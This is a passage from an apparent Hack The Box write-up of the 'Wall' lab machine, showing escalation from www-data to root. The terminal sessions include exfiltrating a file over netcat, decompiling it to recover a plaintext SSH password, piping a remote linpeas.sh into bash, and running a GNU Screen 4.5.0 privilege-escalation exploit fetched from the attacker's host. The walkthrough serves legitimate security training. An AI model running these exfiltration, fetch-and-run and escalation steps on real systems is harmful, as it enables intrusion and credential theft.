667215 8 -rw-r--r-- 1 root root 6133 Jul 30 2019 /var/lib/dpkg/info/python-setuptools.list
667194 4 -rw-r--r-- 1 root root 1584 Jul 30 2019 /var/lib/dpkg/info/python-pip-whl.list
667061 8 -rw-r--r-- 1 root root 4511 Jul 30 2019 /var/lib/dpkg/info/libpython2.7-dev:amd64.list
667158 4 -rw-r--r-- 1 root root 1515 Jul 30 2019 /var/lib/dpkg/info/python-dbus.list
667077 0 -rw-r--r-- 1 root root 0 Jul 30 2019 /var/lib/dpkg/info/python-all.md5sums
655475 4 -rw-r--r-- 1 root root 614 Jul 30 2019 /var/lib/dpkg/info/unzip.list
667086 4 -rw-r--r-- 1 root root 394 Jul 30 2019 /var/lib/dpkg/info/python-dev.list
667121 4 -rw-r--r-- 1 root root 968 Jul 30 2019 /var/lib/dpkg/info/python-enum34.list
667066 4 -rw-r--r-- 1 root root 334 Jul 30 2019 /var/lib/dpkg/info/libpython-dev:amd64.list
667092 0 -rw-r--r-- 1 root root 0 Jul 30 2019 /var/lib/dpkg/info/python-all-dev.md5sums
671145 52 -rw-r--r-- 1 root root 51200 Jul 4 2019 /var/backups/alternatives.tar.0
655477 28 -rw-r--r-- 1 root root 26396 Jul 30 2019 /var/backups/apt.extended_states.0
So running this command, we can get the readable files in between the 2 timestamps we want , piping the error messages into /dev/null and ignoring python's ton of dist-packages. At the very top of that output we are hinted towards a file named backup in /opt/.shelby
www-data@Wall:/dev/shm/html/monitoring$ file /opt/.shelby/backup
/opt/.shelby/backup: python 2.7 byte-compiled
So let's execute it and see what it does:
www-data@Wall:/dev/shm/html/monitoring$ python /opt/.shelby/backup
[+] Done !
www-data@Wall:/dev/shm/html/monitoring$ ls -lash /home/shelby
total 48K
4.0K drwxr-xr-x 6 shelby shelby 4.0K Jul 30 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Jul 4 2019 ..
0 lrwxrwxrwx 1 root root 9 Jul 6 2019 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 shelby shelby 220 Apr 4 2018 .bash_logout
4.0K -rw-r--r-- 1 shelby shelby 3.7K Apr 4 2018 .bashrc
4.0K drwx------ 2 shelby shelby 4.0K Jul 4 2019 .cache
4.0K drwx------ 3 shelby shelby 4.0K Jul 4 2019 .gnupg
4.0K drwxrwxr-x 3 shelby shelby 4.0K Jul 4 2019 .local
4.0K -rw-r--r-- 1 shelby shelby 807 Apr 4 2018 .profile
4.0K drwxr-xr-x 2 shelby shelby 4.0K Jul 4 2019 .rpmdb
8.0K -rw-rw-r-- 1 shelby shelby 4.5K May 1 13:21 html.zip
4.0K -rw------- 1 shelby shelby 33 Jul 4 2019 user.txt
Looks like it updated the html.zip file in shelby's home directory, which obviously, this python file achieved some kind of an authentication to do so. That is because, we (as www-data) cannot write in shelby's home directory:
www-data@Wall:/dev/shm/html/monitoring$ touch test /home/shelby/123
touch: cannot touch '/home/shelby/123': Permission denied
So it means that this python binary that we executed as www-data, managed to update a file in shelby's home directory. Python binaries are reversable so let's copy it to our local machine:
Terminal 1:
www-data@Wall:/dev/shm/html/monitoring$ cd /opt/.shelby
www-data@Wall:/opt/.shelby$ ls -lash
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Jul 30 2019 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 4 2019 ..
4.0K -rw-r--r-- 1 root root 1.2K Jul 30 2019 backup
www-data@Wall:/opt/.shelby$ which nc
/bin/nc
www-data@Wall:/opt/.shelby$ cat backup | nc 10.10.14.8 9002
www-data@Wall:/opt/.shelby$ file backup && md5sum backup
backup: python 2.7 byte-compiled
afc565ae6f186586eef0f5d4e1ff9f5f backup
Terminal 2:
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [~/_HTB/Wall]
→ nc -lvnp 9002 > backup
listening on [any] 9002 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.157] 52084
^C
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [~/_HTB/Wall]
→ file backup && md5sum backup
backup: python 2.7 byte-compiled
afc565ae6f186586eef0f5d4e1ff9f5f backup
Here we see that we successfully saved the backup file to our local machine since both their md5 hashes are the same. Now to decompile this backup file we use a python utility called "uncompyle"
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [~/_HTB/Wall]
→ sudo pip3 install uncompyle
[sudo] password for nothing:
Collecting uncompyle
Downloading uncompyle-2.0.0-py2.py3-none-any.whl (2.2 kB)
Collecting uncompyle6
Downloading uncompyle6-3.6.7-py3-none-any.whl (311 kB)
|████████████████████████████████| 311 kB 1.8 MB/s
Collecting xdis<4.6.0,>=4.5.1
Downloading xdis-4.5.1-py37-none-any.whl (115 kB)
|████████████████████████████████| 115 kB 8.7 MB/s
Collecting spark-parser<1.9.0,>=1.8.9
Downloading spark_parser-1.8.9-py38-none-any.whl (18 kB)
Requirement already satisfied: click in /usr/lib/python3/dist-packages (from spark-parser<1.9.0,>=1.8.9->uncompyle6->uncompyle) (7.0)
Installing collected packages: xdis, spark-parser, uncompyle6, uncompyle
Successfully installed spark-parser-1.8.9 uncompyle-2.0.0 uncompyle6-3.6.7 xdis-4.5.1
[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ uncompyle6 backup
# file backup
# path backup must point to a .py or .pyc file
[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ mv backup backup.pyc
[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ uncompyle6 backup.pyc > backup.py
[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ nano backup.py
# uncompyle6 version 3.6.7
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.2 (default, Apr 1 2020, 15:52:55)
# [GCC 9.3.0]
# Embedded file name: backup.py
# Compiled at: 2019-07-30 15:38:22
import paramiko
username = 'shelby'
host = 'wall.htb'
port = 22
transport = paramiko.Transport((host, port))
password = ''
password += chr(ord('S'))
password += chr(ord('h'))
password += chr(ord('e'))
password += chr(ord('l'))
password += chr(ord('b'))
password += chr(ord('y'))
password += chr(ord('P'))
password += chr(ord('a'))
password += chr(ord('s'))
password += chr(ord('s'))
password += chr(ord('w'))
password += chr(ord('@'))
password += chr(ord('r'))
password += chr(ord('d'))
password += chr(ord('I'))
password += chr(ord('s'))
password += chr(ord('S'))
password += chr(ord('t'))
password += chr(ord('r'))
password += chr(ord('o'))
password += chr(ord('n'))
password += chr(ord('g'))
password += chr(ord('!'))
transport.connect(username=username, password=password)
sftp_client = paramiko.SFTPClient.from_transport(transport)
sftp_client.put('/var/www/html.zip', 'html.zip')
print '[+] Done !'
# okay decompiling backup.pyc
And so we have shelby's credentials ! shelby:ShelbyPassw@rdIsStrong! so we can try to use it to login via ssh:
[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ ssh shelby@10.10.10.157
The authenticity of host '10.10.10.157 (10.10.10.157)' can't be established.
ECDSA key fingerprint is SHA256:rUe3KWmT3ZJhKW+86+Zm8EKcgYr9TPlkU+W962iQEUY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.157' (ECDSA) to the list of known hosts.
shelby@10.10.10.157's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-54-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jul 30 17:36:33 2019 from 192.168.178.1
shelby@Wall:~$ id
uid=6001(shelby) gid=6001(shelby) groups=6001(shelby)
shelby@Wall:~$ cat user.txt
feXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! We have been able to print the user flag.
Now in order to privesc to root we can use a cool privesc tool called Linpeas it was made by carlospolop
Terminal 1:
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [/opt]
→ sudo git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/
Cloning into 'privilege-escalation-awesome-scripts-suite'...
remote: Enumerating objects: 166, done.
remote: Counting objects: 100% (166/166), done.
remote: Compressing objects: 100% (134/134), done.
remote: Total 1933 (delta 100), reused 62 (delta 31), pack-reused 1767
Receiving objects: 100% (1933/1933), 11.30 MiB | 4.46 MiB/s, done.
Resolving deltas: 100% (1051/1051), done.
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [/opt]
→ sudo updatedb
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [/opt]
→ cd -
/home/nothing/_HTB/Wall
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [~/_HTB/Wall]
→ locate linpeas.sh
/opt/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [~/_HTB/Wall]
→ cp /opt/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
[ 10.10.14.8/23 ] [ /dev/pts/4 ] [~/_HTB/Wall]
→ python -m SimpleHTTPServer 9090
Serving HTTP on 0.0.0.0 port 9090 ...
Terminal 2:
shelby@Wall:~$ which wget; which curl; which nc
/usr/bin/wget
/bin/nc
shelby@Wall:~$ wget http://10.10.14.8:9090/linpeas.sh -O - | bash
LinPEAS is preety cool because it adds color to our privilege escalation checks unlike the usual LinEnum.sh, so we can pinpoint what's important more quickly.
So here we are hinted towards the /bin/screen-4.5.0 binary which seems to contain a very likely privesc vector:
[ 10.10.14.8/23 ] [ /dev/pts/6 ] [~/_HTB/Wall]
→ searchsploit screen | grep 4.5
GNU Screen 4.5.0 - Local Privilege E | exploits/linux/local/41152.txt
GNU Screen 4.5.0 - Local Privilege E | exploits/linux/local/41154.sh
PeerBlock 1.1 - Blue Screen of Death | exploits/windows/dos/18475.txt
Solaris 11.4 - xscreensaver Privileg | exploits/solaris/local/47529.txt
Solaris xscreensaver 11.4 - Privileg | exploits/solaris/local/47509.txt
So here we see the public exploits available to us, which should ring a bell because we also did a privesc through the screen binary back in the Haircut box which had literally the same binary as this box, so it will be quite similar:
Terminal 1:
[ 10.10.14.8/23 ] [ /dev/pts/6 ] [~/_HTB/Wall]
→ locate 41154.sh
/usr/share/exploitdb/exploits/linux/local/41154.sh
[ 10.10.14.8/23 ] [ /dev/pts/6 ] [~/_HTB/Wall]
→ cp /usr/share/exploitdb/exploits/linux/local/41154.sh .
[ 10.10.14.8/23 ] [ /dev/pts/6 ] [~/_HTB/Wall]
→ python -m SimpleHTTPServer 9090
Serving HTTP on 0.0.0.0 port 9090 ...
Terminal 2:
shelby@Wall:~$ ls
html.zip user.txt
shelby@Wall:~$ wget http://10.10.14.8:9090/41154.sh
--2020-05-01 14:14:09-- http://10.10.14.8:9090/41154.sh
Connecting to 10.10.14.8:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1192 (1.2K) [text/x-sh]
Saving to: ‘41154.sh’
41154.sh 100%[===========================================================>] 1.16K --.-KB/s in 0s
2020-05-01 14:14:09 (120 MB/s) - ‘41154.sh’ saved [1192/1192]
shelby@Wall:~$ bash 41154.sh
[...]
# cat /root/root.txt
1fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We have been able to print out the root flag.
Here we can see the progress graph :
Until there is Nothing left.
Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8
Contact: nihilist@contact.nowhere.moe (PGP)